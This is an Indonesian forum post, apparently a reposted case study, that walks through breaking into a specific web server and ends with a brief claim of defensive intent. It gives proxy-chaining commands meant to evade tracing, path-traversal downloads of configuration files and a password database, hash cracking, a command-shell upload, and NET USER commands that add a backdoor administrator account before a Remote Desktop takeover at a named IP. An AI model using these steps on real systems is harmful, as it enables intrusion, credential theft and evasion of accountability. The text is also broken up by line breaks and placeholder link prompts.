BELAJAR HACK SITUSHehehehe ngomong2
dulu
forum cianjur33.forumotion.com juga sempet ada yang hack...!!!
ketauan
cuma ip nya
aja tapi orangnya belum kertemu
Studi Kasus
kelemahan Server
Situs
[You must be registered and logged in to see this link.]Oleh
Satria Kelana
Published:
Oktober 29, 2007
Print
Situs
[You must be registered and logged in to see this link.]secara
sekilas terlihat tidak memiliki bug yang cukup berarti untuk
dieksploitasi
oleh hacker. Namun ternyata masih terdapat celah yang
bisa
dieksploitasi.
Berikut ini langkah-langkah yang dilakukan untuk
membobol
server
ini.
1. Persiapan hacking
2.
Pemeriksaan
bug
3. Mendownload source code dan file konfigurasi
4.
Mengupload file explorer dan windows shell command interface
5.
Mengambil-alih
serverSaya akan menjelaskan
langkah-langkah di atas
satu per satu.
1.
Persiapan hackingSebelumnya
Anda harus memiliki list proxy
server yang mendukung
proxy-chain
untuk menghindari pelacakan. Anda
harus mengkoneksikan
sekurang-kurangnya
2 anonymous proxy server di 2
negara yang berbeda.
Anda dengan
mudah mendapatkan proxy server di
search engine Google.
Namun
bila Anda menemukan lebih banyak
transparant proxy server,
gunakan
3 transparant proxy server yang
mendukung chain, dan rutekan
koneksinya
melintasi beberapa negara,
misalnya: Brazil - China - India,
sehingga
bila dilacak oleh
"Pengejar Hacker" maka mereka hanya akan
melacak
koneksi dari ISP
Indonesia ke China.
Pada sistem operasi
windows, anda dapat
menggunakan software mungil
bouncer.exe untuk
melakukan proxy-chain
melalui parameter tunneling.
Contoh dengan
IP lokal 192.168.0.5:
bouncer
--bind 192.168.0.5 --port 8881
--tunnel 82.0.0.1:8080 --destination
221.0.0.1:8080
bouncer
--bind 192.168.0.5 --port 8882 --tunnel
192.168.0.5:8881
--destination 200.0.0.1:3128
Pada contoh di
atas, bila kita
mengeset proxy pada internet browser
menjadi
192.168.0.5:8882
maka koneksi kita akan dirutekan melalui proxy
server:
82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 ->
[You must be registered and logged in to see this link.]Karena
kita menggunakan transparant proxy server maka IP 221.0.0.1 juga
akan
terlacak. Namun ini tidak masalah karena kita sebenarnya
terkoneksi
dari
proxy server 82.0.0.1.
2. Pemeriksaan bugPemeriksaan
dilakukan secara trial and error pada setiap parameter yang
diperkirakan
mengandung bug. Pada kasus ini terdapat bug pada module
downloading
file
untuk mendownload file .mp3 dengan URL:
[You must be registered and logged in to see this link.]Dari
parameter di atas terlihat file dl_comm.cfm terletak pada folder
download.
Sekarang kita coba secara langsung mengeksekusi pada file
.cfm
tersebut
dan menyisipkan parameter querystring cfile untuk
mendapatkan
source codenya.
[You must be registered and logged in to see this link.]Ternyata
hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian
penting dari source code tersebut.
Dari source
code ini kita bisa menemukan bahwa terdapat parameter
querystring
abs_dir
dan cfile yang bisa mengarahkan kita untuk
mendownload file
apa
saja dari harddisk server.
3.
Mendownload
source code dan file konfigurasiKita jejaki
setiap
link di dalam source code-nya, kemudian kita download. Misalnya:
[You must be registered and logged in to see this link.]Dari
kumpulan file inilah kemudian kita mendapatkan bocoran source code
situs
[You must be registered and logged in to see this link.] yang telah diberitakan
sebelumnya
di situs ini.
Selanjutnya kita download file
konfigurasi web
servernya dengan cara berikut:
File konfigurasi
IIS:
[You must be registered and logged in to see this link.]File
konfigurasi CFM:
[You must be registered and logged in to see this link.]File
History Internet Explorer untuk Administrator
[You must be registered and logged in to see this link.] and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Dari
file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs
web
yang hosting di server ini.
-
[You must be registered and logged in to see this link.] yang terletak di
E:\webuser\web\powerofpaytv.com
-
[You must be registered and logged in to see this link.] yang terletak di
E:\webuser\web\jedrealty.com
-
[You must be registered and logged in to see this link.] yang terletak di E:\webuser\web\rasasayang.com.my
Dari file
index.dat
kita dapat mengetahui bahwa Administrator melakukan
proses
administrasi
upload dan download file dengan mengunjungi
[You must be registered and logged in to see this link.]Dari
file neo-query.xml kita dapat mengetahui file database pengguna
terletak
di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db. mdb yang
dapat
kita download melalui:
[You must be registered and logged in to see this link.]Dari
file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password
dalam
bentuk MD5 hash. Dengan menggunakan software decryptor misalnya
Cain
& Abel kita dapat mendecyrpt passwordnya.
4. Mengupload file explorer dan windows shell command
interfaceDari
[You must be registered and logged in to see this link.]kita
dapat
mengupload file explorer misalnya ASF File Explorer yang
dibuat
oleh Nahuel Foronda and Laura Arguello. Dengan ASF File
Explorer,
kita
dapat membrowse file di harddisk secara lebih leluasa,
serta
meng-upload,
download dan delete file.
Untuk windows shell
command
interface, kita buatkan file.CFM dengan script berikut:
arguments="#strArg#"
timeout="5">
#Replace(Replace(Replace('#cmdResult#',
'<', '<', 'all'), '>', '>', 'all'), Chr(10), '
',
'all')#
5. Mengambil-alih
serverKita dapat
menambahkan user login windows (group
administrator) dengan
mengeksekusi
perintah berikut pada windows
shell command interface.
NET
USER mbahjambon mypassword /ADD
/ACTIVE:YES /EXPIRES:NEVER
/PASSWORDCHG:YES
NET LOCALGROUP
Administrators mbahjambon /ADD
Dengan
menggunakan Windows Remote
Desktop kita dapat mengambil alih
servernya
(IP 202.157.176.17).
Koneksinya tetap dilakukan melalui proxy
tunneling
seperti contoh
berikut:
bouncer --bind 192.168.0.5 --port
8883 --tunnel
82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer
--bind 192.168.0.5
--port 8884 --tunnel 192.168.0.5:8883
--destination 202.157.176.17:3389
sehingga
kita dapat
meremote server melalui Remote Desktop pada alamat:
192.168.0.5:8884
Demikian
cara yang digunakan untuk membobol
server situs
[You must be registered and logged in to see this link.] Dengan membaca tulisan
ini, mudah-mudahan para pembaca dapat
menghindari bug sejenis pada
server Anda.
digunakan
dengan bijak...
jangan
di salah gunakan..
salam buat para
hacker [You must be registered and logged in to see this image.]